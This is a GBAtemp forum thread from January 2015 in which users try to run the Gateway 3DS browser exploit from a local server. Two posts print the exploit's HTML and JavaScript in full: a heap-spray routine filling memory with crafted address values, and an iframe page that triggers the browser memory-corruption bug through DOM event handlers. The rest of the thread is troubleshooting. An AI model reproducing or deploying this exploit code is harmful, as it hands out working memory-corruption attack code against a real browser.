[Attempt] Running GW3.0 Web Exploit on a Local Network

Discussion in '3DS - Flashcards & Custom Firmwares' started by bendrr, Jan 10, 2015.

  1. bendrr
    OP

    bendrr GBAtemp Regular

    Member
    155
    58
    Dec 3, 2014
    United States
    I can't browse anything but ssl ( https:// ) right now with my 3ds browsers. I copied the javascript and html at http://go.gateway-3ds.com/index.php and saved it on my local xampp network so I can browse it from my network. No joy so far, just loads the page and does nothing. It's on 6.2 firmware. I formatted it, cleared history and cookies.

    So the question is, since the browser exploit just loads launcher.dat from the sd card ( smc://launcher.dat ), should it work just the same on my network. The xampp install works fine.



    The files I used for my solution were from from Falo:

    There were various instructions from others in this thread, read for details.
     
    bowser likes this.


  2. Venseer

    Venseer A weapon to surpass Metal Gear

    Member
    205
    151
    Dec 12, 2013
    Brazil
    Kennedy Space Center
    It's a PHP page
    Maybe there is hidden PHP code on it? Not sure
     
    Kelton2 likes this.
  3. PhoenixWrightX

    PhoenixWrightX GBAtemp Regular

    Member
    219
    130
    Jun 11, 2014
    United States
    It begins.
     
  4. bendrr
    OP

    bendrr GBAtemp Regular

    Member
    155
    58
    Dec 3, 2014
    United States
    Just to get it out of the way, this is the html on the page in question,
    HTML:
    <html>
    <head>
    <style>
        body {
            color:white;
            background:black;
        }
       
       
    </style>
    <script>
        function magicfun(mem, size, v) {
            var a = new Array(size - 20);
            nv = v + unescape("%ucccc");
            for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
            var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
     
            mem.push(t);
        }
     
        function dsm(evnt) {
            var mem = [];
     
            for (var j = 20; j < 430; j++) {
                magicfun(mem, j, unescape("\u0000\u08e0\u0004\u08e0\u0008\u08e0\u000c\u08e0\u0010\u08e0\u0014\u08e0\u0018\u08e0\u001c\u08e0\u0020\u08e0\u0024\u08e0\u0028\u08e0\u002c\u08e0\u0030\u08e0\u0034\u08e0\u0038\u08e0\u003c\u08e0\u0040\u08e0\u0044\u08e0\u0048\u08e0\u004c\u08e0\u0050\u08e0\u0054\u08e0\u0058\u08e0\u005c\u08e0\u0060\u08e0\u0064\u08e0\u0068\u08e0\u006c\u08e0\u0070\u08e0\u0074\u08e0\u0078\u08e0\u007c\u08e0\u0080\u08e0\u0084\u08e0\u0088\u08e0\u008c\u08e0\u0090\u08e0\u0094\u08e0\u0098\u08e0\u009c\u08e0\u00a0\u08e0\u00a4\u08e0\u00a8\u08e0\u00ac\u08e0\u00b0\u08e0\u00b4\u08e0\u00b8\u08e0\u00bc\u08e0\u00c0\u08e0\u00c4\u08e0\u00c8\u08e0\u00cc\u08e0\u00d0\u08e0\u00d4\u08e0\u00d8\u08e0\u00dc\u08e0\u00e0\u08e0\u00e4\u08e0\u00e8\u08e0\u00ec\u08e0\u00f0\u08e0\u00f4\u08e0\u00f8\u08e0\u00fc\u08e0\u0100\u08e0\u0104\u08e0\u0108\u08e0\u010c\u08e0\u0110\u08e0\u0114\u08e0\u0118\u08e0\u011c\u08e0\u0120\u08e0\u0124\u08e0\u0128\u08e0\u012c\u08e0\u0130\u08e0\u0134\u08e0\u0138\u08e0\u013c\u08e0\u0140\u08e0\u0144\u08e0\u0148\u08e0\u014c\u08e0\u0150\u08e0\u0154\u08e0\u0158\u08e0\u015c\u08e0\u0160\u08e0\u0164\u08e0\u0168\u08e0\u016c\u08e0\u0170\u08e0\u0174\u08e0\u0178\u08e0\u017c\u08e0\u0180\u08e0\u0184\u08e0\u0188\u08e0\u018c\u08e0\u0190\u08e0\u0194\u08e0\u0198\u08e0\u019c\u08e0\u01a0\u08e0\u01a4\u08e0\u01a8\u08e0\u01ac\u08e0\u01b0\u08e0\u01b4\u08e0\u01b8\u08e0\u01bc\u08e0\u01c0\u08e0\u01c4\u08e0\u01c8\u08e0\u01cc\u08e0\u01d0\u08e0\u01d4\u08e0\u01d8\u08e0\u01dc\u08e0\u01e0\u08e0\u01e4\u08e0\u01e8\u08e0\u01ec\u08e0\u01f0\u08e0\u01f4\u08e0\u01f8\u08e0\u01fc\u08e0"));
            }
        }
    </script>
    </head>
    <body>
            <h1 align="center">GATEWAY 3DS LOADING...</h1>
    </body>
    </html>
    
    It should run no matter what server it is on right? ( local or not )
     
  5. hias

    hias Member

    Newcomer
    27
    9
    Jun 16, 2014
    Argentina
    No, you downloaded the wrong file, you miss the hidden iframe and the correct payload.
    Check my post on the main thread.
    Visit the site on your pc using the correct 3ds user agent and try again please :)
     
    Margen67 likes this.
  6. bendrr
    OP

    bendrr GBAtemp Regular

    Member
    155
    58
    Dec 3, 2014
    United States
    so thats the issue, will move to a normal internet connection and try again.

    Does anyone have the contents of the iframe?
     
  7. hias

    hias Member

    Newcomer
    27
    9
    Jun 16, 2014
    Argentina
    The iframe just executes the javascript code via event. Not sure if this is needed and part of the browser bug. The important part is the correct payload.
     
  8. KingBlank

    KingBlank King of Nothing

    Member
    560
    217
    Sep 17, 2008
    New Zealand
    New Zealand
    It would be great if we could save the exploit to the 3ds somehow and navigate to it in the browser to run it without a server
     
  9. Thomas12345

    Thomas12345 GBAtemp Advanced Fan

    Member
    551
    409
    Dec 1, 2014
    Canada
    I have the index.html and frame.html but i cannot get it to work on my own server.
     
  10. bendrr
    OP

    bendrr GBAtemp Regular

    Member
    155
    58
    Dec 3, 2014
    United States
    Can you paste the contents of iframe.html somewhere. I'd love to look at it.
     
    Margen67 likes this.
  11. Thomas12345

    Thomas12345 GBAtemp Advanced Fan

    Member
    551
    409
    Dec 1, 2014
    Canada
    The frame.html

    Code:
    <html>
            <head>
                    <script>
                            var nb = 0;
                            function handleBeforeLoad() {
                                    if (++nb == 1) {
                                            p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                                    } else if (nb == 2) {
                                            p.removeChild(f);
                                    }
                            }
     
                            function documentLoaded() {
                                    f = window.frameElement;
                                    p = f.parentNode;
                                    var o = document.createElement("object");
                                    o.addEventListener('beforeload', handleBeforeLoad, false);
                                    document.body.appendChild(o);
                            }
     
                            window.onload = documentLoaded;
                    </script>
            </head>
            <body>
                    KEKEKEKEK...
            </body>
    </html>
    
     
    Margen67 and bendrr like this.
  12. bendrr
    OP

    bendrr GBAtemp Regular

    Member
    155
    58
    Dec 3, 2014
    United States

    Thanks, will try it
     
    Margen67 likes this.
  13. loco365

    loco365 GBAtemp Guru

    Member
    5,458
    2,674
    Sep 1, 2010
    Yeah, if you change your user agent to that of a 3DS browser, you can grab the code yourself and try locally hosting it.
     
    Margen67 likes this.
  14. Helper

    Helper GBAtemp Regular

    Member
    136
    83
    Sep 14, 2009
    United States
    Are y'all entirely certain the web browser entrypoint only loads launcher.dat? If so, why--do you have evidence to suggest so?
    If not, I'd probably try sniffing the network to see if the 3DS downloads any other data when the exploit is executed (in the normal way, from the GW website).

    Also, could you clarify "just loads the page and does nothing"? I assume this means 'I see "GATEWAY 3DS LOADING"; the web browser does not close with an error or otherwise misbehave'; is this correct?

    (I'm a useless asshole who can't help you anyway--sorry ;_;. I'm just interested in the browser exploit.)
     
  15. andzalot55

    andzalot55 I'm very delicious. mmmm.

    Member
    741
    208
    Nov 14, 2014
    Canada
    Mc Donalds.

    Have you tried the QR Code version? I saw a post about it.
     
  16. Bug_Checker_

    Bug_Checker_ GBAtemp Advanced Fan

    Member
    950
    444
    Jun 10, 2006
    United States
    Margen67 and bendrr like this.
  17. bendrr
    OP

    bendrr GBAtemp Regular

    Member
    155
    58
    Dec 3, 2014
    United States


    Thanks, missed that.

    Tried running it locally, no dice. Will move the 3ds to a normal network tomorrow and finish the update then.
     
  18. bendrr
    OP

    bendrr GBAtemp Regular

    Member
    155
    58
    Dec 3, 2014
    United States


    The browser closes with an error after the page loads asking me to restart the 3ds when I load the exploit locally. I do see gateway 3ds loading... before it closes.
     
  19. Helper

    Helper GBAtemp Regular

    Member
    136
    83
    Sep 14, 2009
    United States
    Interesting. And that's the error which asks you to save and then restart it yourself--not the one which forces a shutdown as soon as you acknowledge the message?

    If it's the latter, I'd say something has gone very wrong somewhere. But if it's the former, I think you're almost there. I kept getting the error message upon loading the page; I finally got it to work by placing launcher.dat on a different, newly-formatted SD card. Anyway, it sounds like you have your server set up perfectly--kudos for that!
     
  20. bendrr
    OP

    bendrr GBAtemp Regular

    Member
    155
    58
    Dec 3, 2014
    United States
    The first error you mentioned is the one. I looked at the javascript functions that I see and it's a buffer overload I think. Wonder why it's not working. The console doesn't throw any errors with default settings. I wonder what firebug would report if anything.

    *edit
    Just an undefined error, no specifics so far. It's my network I'm positive but I wonder why it can't be executed off their server. If it matters to anyone with the same error, I also get "Failed to load part of this page" when trying to use it locally.

    If they enabled ssl for the /go/ folder, that would solve some problems for me (and others?).

    Another note, wish they would release the index.php and javascript for a backup url and even better, offline mode. I suppose offline mode is in the next update maybe? The index file has some of the exploit, calculations I think?

    Any ideas?